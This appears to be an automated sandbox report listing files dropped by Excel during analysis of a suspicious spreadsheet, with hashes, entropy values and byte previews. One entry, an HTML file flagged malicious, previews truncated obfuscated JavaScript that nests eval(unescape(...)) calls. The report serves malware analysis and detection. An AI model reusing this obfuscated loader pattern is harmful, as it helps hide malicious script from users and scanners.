        Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):8084
        Entropy (8bit):2.5551694039574895
        Encrypted:false
        SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
        MD5:721E8AAC81F0A6D4659831CB8194D668
        SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
        SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
        SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
        Malicious:false
        Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):149960
        Entropy (8bit):2.7999272293226953
        Encrypted:false
        SSDEEP:1536:/+cdNPHn2Ok2dgzi1ENUAI8DHW/97p8/JYbhaEUbNlzG4UK:/+cdNvD9dguQS4UK
        MD5:B89E4A9028608A7E7FC359B2F457418B
        SHA1:87182FFA15FAB9C6E1404347925545B5804F42DF
        SHA-256:4E31467183675CAEA85301F6C05D53281FC35FBE12F32C7E960E7766B5E6EB4F
        SHA-512:DDEEFC01437C7B20FBCA8161B166B32C23122294E00AC8EA26DA5FD944C4EE51CB730E772AACFF026DC16F3445FDEB2B22CCE771F5558AA7F777249D9E3900C4
        Malicious:false
        Preview:....l...........................Z....G.. EMF.....I..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................hH....=.......`A....(.......0.....l...l..............a....u0...........9...0....f.............. ....a...X.l....
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):1293620
        Entropy (8bit):4.563127917199792
        Encrypted:false
        SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
        MD5:F71C973B5E362DFD6408D6C009E5643E
        SHA1:24B3CE67B31BFD4791287932206D54C73489424E
        SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
        SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
        Malicious:false
        Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):44256
        Entropy (8bit):3.15066292565687
        Encrypted:false
        SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
        MD5:F1EC2E98B0F577B675156B13DCF94105
        SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
        SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
        SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
        Malicious:false
        Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):8184
        Entropy (8bit):2.4569645361662147
        Encrypted:false
        SSDEEP:96:EV5g2s88nDwAg2Aqw5r9rQWZBSA+B79YIRdMZgmR7qii1BoFV:EawD22iWZs79RdGgmR7qii1BY
        MD5:4D29556ADEA0A5E79E69F9E798831B27
        SHA1:D396BC80D8E3ED2A82C2404FAE24C5F5B7F19D38
        SHA-256:2BFA456B941A33C4D54C81D2CEE32867347E6B452E1EE0EEF13400A3FD98FEBF
        SHA-512:36912843461B1C0E972333DB3C0157B6C02E48243CE01EA07B4FEE80B5417AE118A5BF11C9BE9EFCBC72A6C1BFC5E65D5BF0C3A205E73B50F2F2A33E94C433AA
        Malicious:false
        Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):98872
        Entropy (8bit):2.64266893921781
        Encrypted:false
        SSDEEP:768:XO6lZVVvpL1DW7ohBb66mQK4BTonxqQbApQKyE:+6lZtPQE
        MD5:AE95F30ECF35EE78C409C130558AD6FD
        SHA1:F715389C387C40E771557B80899A48A7CEAC3728
        SHA-256:AC99525A9EB8709C8AF4D29DAC9EFD38EBE0C8533379425F7FEE82E3CA38EEB8
        SHA-512:73C10DFA53108D7794D84F0493173EBDA6878E54AD9968177E1B6CCF84AFF88369536037BA18EAE12DEDF1BA6F026FC5057E8E7A7B3C42B27C8539C478547FCB
        Malicious:false
        Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):150296
        Entropy (8bit):2.8092698272953958
        Encrypted:false
        SSDEEP:3072:BW8dQ32qgr+p381ivrWNJqQVmlSV6YyNbDmi0:V+p381ivrWgp0
        MD5:08B18487E54B73B05B3DEFBEDA35EC0B
        SHA1:70816C317155BC0C6832940DBB46080FAAA31C10
        SHA-256:024EF41C9389CA541CB09B73545F102A1F30BC414F8E4DC97D48EB1BA0C845BD
        SHA-512:AC0D2A5A82BE6A2880D93EE2500AE06AB7D1B6D64992D4F9425284938807B27D1666CB2B0C4C55BC02A016A67BE36132742C8F86584C42BD9C7548D130574EED
        Malicious:false
        Preview:....l...........................Z....G.. EMF.....K..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................hH....=.......`A....(.......0.....l...l..............a....u0...........9...0....f.............. ....a...X.l....
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):153132
        Entropy (8bit):2.766324628026199
        Encrypted:false
        SSDEEP:1536:/yal9Bri6XkRMamXUv6INHOqXbk0WYqEkRARP:/dbIZP
        MD5:970B7DB8B19DC4B20361D42B871D2861
        SHA1:28194CAA9B25A38F3F1FBB224DC2913E1E4EC4FC
        SHA-256:0AF1EB14EE2CEA11DB4D547D2EF5BECABB19C25F7FF5A36EF8A4A350FC998E2E
        SHA-512:DA37677AD2CEA9A020D8F258B425E707FA657AB8EA45CA634F289ABB30B5132E4A1DC671FAE49847A967EADABE7C31A801F4F70589B36C5D81F9B72E63FD6185
        Malicious:false
        Preview:....l...........................Z....G.. EMF....,V..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................&...........................%...........................6.......#.......&...........................%...........L...d...........".......................!...........
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):44256
        Entropy (8bit):3.147465798679962
        Encrypted:false
        SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
        MD5:36D8FF25D14E7E2FBB1968E952FF9C17
        SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
        SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
        SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
        Malicious:false
        Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):109544
        Entropy (8bit):4.282675970330063
        Encrypted:false
        SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
        MD5:F7B9A8F20E64B2CB6B572BCBA5866236
        SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
        SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
        SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
        Malicious:false
        Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):8208
        Entropy (8bit):2.4800658647847715
        Encrypted:false
        SSDEEP:96:Eeg2s88nD8rkgnI5i9OWZBKlA+B79YIRdMZgmR7qii1BoFV:E/870fWZ4F79RdGgmR7qii1BY
        MD5:EE751D476B6280998392261187C2B4AB
        SHA1:AAD3D4438DEC5A543930DF0A1C79C86567F751B5
        SHA-256:840C15825E62B7FBB1AB58EC3D7145D20B3A70894780D292C01B83FB5091555A
        SHA-512:0AF8E2C9041718E757F393D0113FE76CED8530826D808B994574056725973E81AB339BC9AD005DB9B9DCD7C390BDA9936E499ABF9050BEA03FA157746AD078E3
        Malicious:false
        Preview:....l...........{...U............A...... EMF..... ..............................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):8184
        Entropy (8bit):2.4569645361662147
        Encrypted:false
        SSDEEP:96:EV5g2s88nDwAg2Aqw5r9rQWZBSA+B79YIRdMZgmR7qii1BoFV:EawD22iWZs79RdGgmR7qii1BY
        MD5:4D29556ADEA0A5E79E69F9E798831B27
        SHA1:D396BC80D8E3ED2A82C2404FAE24C5F5B7F19D38
        SHA-256:2BFA456B941A33C4D54C81D2CEE32867347E6B452E1EE0EEF13400A3FD98FEBF
        SHA-512:36912843461B1C0E972333DB3C0157B6C02E48243CE01EA07B4FEE80B5417AE118A5BF11C9BE9EFCBC72A6C1BFC5E65D5BF0C3A205E73B50F2F2A33E94C433AA
        Malicious:false
        Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):8184
        Entropy (8bit):2.4822415673316294
        Encrypted:false
        SSDEEP:96:EV5g2s88nD8rkgv/I5i9OWZBKlA+B79YIRdMZgmR7qii1BoFV:Ea870fWZ4F79RdGgmR7qii1BY
        MD5:3D11FD6BBFABBF475F9FF001B4871224
        SHA1:0E291A5FFE0EC161DB2BA2CC913A1DC5BCE320DE
        SHA-256:858910BC62E67E98EF64B726E7ABDD6857BBDAED9E5EECB3603F8136993E4989
        SHA-512:B63DAB3F908E55075BBE4F666863E169E566E54CBD3CFA6D5210E130AAD2D583451351FAC6E773E34CA6441D06A7524577FC9441FD6A11B775F148C543B0B6DF
        Malicious:false
        Preview:....l...........{...U............A...... EMF....................................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):98872
        Entropy (8bit):2.64266893921781
        Encrypted:false
        SSDEEP:768:XO6lZVVvpL1DW7ohBb66mQK4BTonxqQbApQKyE:+6lZtPQE
        MD5:AE95F30ECF35EE78C409C130558AD6FD
        SHA1:F715389C387C40E771557B80899A48A7CEAC3728
        SHA-256:AC99525A9EB8709C8AF4D29DAC9EFD38EBE0C8533379425F7FEE82E3CA38EEB8
        SHA-512:73C10DFA53108D7794D84F0493173EBDA6878E54AD9968177E1B6CCF84AFF88369536037BA18EAE12DEDF1BA6F026FC5057E8E7A7B3C42B27C8539C478547FCB
        Malicious:false
        Preview:....l............................}...... EMF....8...g...........................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............!...............)...!..............?...........?................................L...d...E...............E...............!..............?........
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:HTML document, ASCII text, with very long lines (8246), with CRLF line terminators
        Category:dropped
        Size (bytes):8332
        Entropy (8bit):2.8904960135349156
        Encrypted:false
        SSDEEP:192:tHaCEQ66dDJeum2oum25T6lS5KUJDVUKhC14GVf/Av66dDumAVYxequccVFArb7P:t1EQ66dDJeum2oum25T6lS5KUJDVUKhd
        MD5:C8FD3EE1758FAE829C2DDD79608A98B8
        SHA1:022E69C60D4975F804B21AAA244CE2301F46059F
        SHA-256:687DA6F55AC9B9CCEFEBDD825B28E8DD6AA48DAB385C46025A8CF477B7A29802
        SHA-512:4794308D1E034D65347D21B1D854481D9B2ED8A672280281F81CD81591E0D029DBAD9D48890284671ED63D64E79F31801729B93479FF9527C9EB2776A394B4C9
        Malicious:true
        Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%63%25%33%38%25%33%38%25%36%34%25%36%32%25%36%36%25%33%35%25%36%36%25%33%35%25%33%32%25%33%30%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%30%25%33%32%25%33%36%25%33%37%25%33%37%25%33%39%25%32%32%25%32%39%25%33%62%25%30%61%
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):820
        Entropy (8bit):2.7159862044217853
        Encrypted:false
        SSDEEP:24:YIrNyk+vpKAzH5wcfHGFAAJp9WtAZRJ5poIHWI:Ymt+RfzHuc8AAJtfJ52IHV
        MD5:4C216BA54D1A1E057DBD017884BCAE68
        SHA1:04F6A2A122C952A6EE4E54FDB8185D4052074B21
        SHA-256:80AB97552897B6DD6B37DC244018756D8FE893435AA360A26BFF8E6560D81E9C
        SHA-512:1F5F905260B372F9AEE7B6E574F0F427A85F74F30AB90B2CBF7847462A437C8907BDCA33D54260F685AEC64CC53E3241E37A8D6999AB01138C08DB2B39FF7371
        Malicious:false
        Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.1.1.1.1.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):208896
        Entropy (8bit):6.630660475707632
        Encrypted:false
        SSDEEP:6144:InXCBAk3hbdlylKsgwyzcTbWhZFVE+WaxHA1Whcx7PIDqZ8:InsIW+xPJ
        MD5:B4D6E04DA5080958456A59AA1F3B9303
        SHA1:8340279CF443F07FCF20F0868D53801DD99FE5D4
        SHA-256:8CFE0079008C37823F4C768807AF55ABDB0D45B7DF27A05F24B3346B664A7B73
        SHA-512:406C9290F816537CB389B770BDF7381B10C1BDAC718167FA9383209C3242226CBEBC38537A7ADCBA8A8816EA623184BA2E49AD8B677FECECF29D00421E7ABD49
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):53760
        Entropy (8bit):7.375628575431627
        Encrypted:false
        SSDEEP:768:KEVIHbSIpsp3/10qfTaClc4xJNzD/1FCUpeZ8Ak5mhvvYVZAfB:KRHbXpsJ2crDtkFZ8nuXBB
        MD5:ECA38EA8A3DF9C1D3564CB551743A360
        SHA1:BFB1F3AD75E69B04A500D23A0C8F1E68EBDCE3C6
        SHA-256:FE8334B45D78FA01F0F6710B01C19DF3F2AB290F4B90680F13B75D268CF647AE
        SHA-512:CA176F469E81C4DD200BDD3241786C0965B4EE77D9CD9F9493F886E1D7C144BD82A9A75532FC1CD7F56C4D3EB64D23BDF803D63CBBC73991C1CCFC7C80BEDB62
        Malicious:false
        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...............................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):40960
        Entropy (8bit):7.455748049595715
        Encrypted:false
        SSDEEP:768:Gjy/DwTo0TJZpXXGvdfBwEhkYzYGn5tK7ilqjqn:GEh0tZp4tSEqkYk/Hl3
        MD5:7CE9AE4AC122EA7E0CA1F0B547EB42F2
        SHA1:1AF0B706A6F2720930E7F2349962C016144EDF19
        SHA-256:0189669A6B749BEE12D71874C549FA0A54698DCFAB7680C49CD3B3B617A9E4E3
        SHA-512:CE6905446A0F37417263DCEA1ED23D7328359E3B96223F04276970ADE260D3AC603EA0FCE53933374B27C753AA6737DCE3F0F329F559D91B76E53FB70D894DAE
        Malicious:false
        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...................................................................................................................................................................................
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 16:06:31 2024, Security: 1
        Category:dropped
        Size (bytes):840192
        Entropy (8bit):7.632924625766575
        Encrypted:false
        SSDEEP:12288:Zns7W+EJEUiOIBUzMTSPD3DERnLRmF8DhEPXxpsAQx1Zj+jDEPtPJfr9A:ZnvBambARM8AX8Z+jitPJZA
        MD5:B416DBDCA4696C17F530028967A19DFD
        SHA1:C595572E07524471693A2BEE96B0186EEC220E60
        SHA-256:957BB97AA83E0DF1C5BAB0713E08584A8FFBE9CB3519449FAABF4E8844BD12EA
        SHA-512:FE96637337B63914E5B2B4321C5E0945D99FF1BDF9065A85376346CADBA680DD8EF6C1113D15728E17C68B9478A4F24077B57373CE634149E5F7F7BA9077EC4E
        Malicious:false
        Preview:......................>...................................M...................P...Q...R...S...................=...>...Y...............................................................................................................................................................................................................................................................................................................................................................................................................O................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...........<.......................U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):26
        Entropy (8bit):3.95006375643621
        Encrypted:false
        SSDEEP:3:ggPYV:rPYV
        MD5:187F488E27DB4AF347237FE461A079AD
        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
        Malicious:false
        Preview:[ZoneTransfer]....ZoneId=0
        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 16:06:31 2024, Security: 1
        Category:dropped
        Size (bytes):840192
        Entropy (8bit):7.632924625766575
        Encrypted:false
        SSDEEP:12288:Zns7W+EJEUiOIBUzMTSPD3DERnLRmF8DhEPXxpsAQx1Zj+jDEPtPJfr9A:ZnvBambARM8AX8Z+jitPJZA
        MD5:B416DBDCA4696C17F530028967A19DFD
        SHA1:C595572E07524471693A2BEE96B0186EEC220E60
        SHA-256:957BB97AA83E0DF1C5BAB0713E08584A8FFBE9CB3519449FAABF4E8844BD12EA
        SHA-512:FE96637337B63914E5B2B4321C5E0945D99FF1BDF9065A85376346CADBA680DD8EF6C1113D15728E17C68B9478A4F24077B57373CE634149E5F7F7BA9077EC4E
        Malicious:false
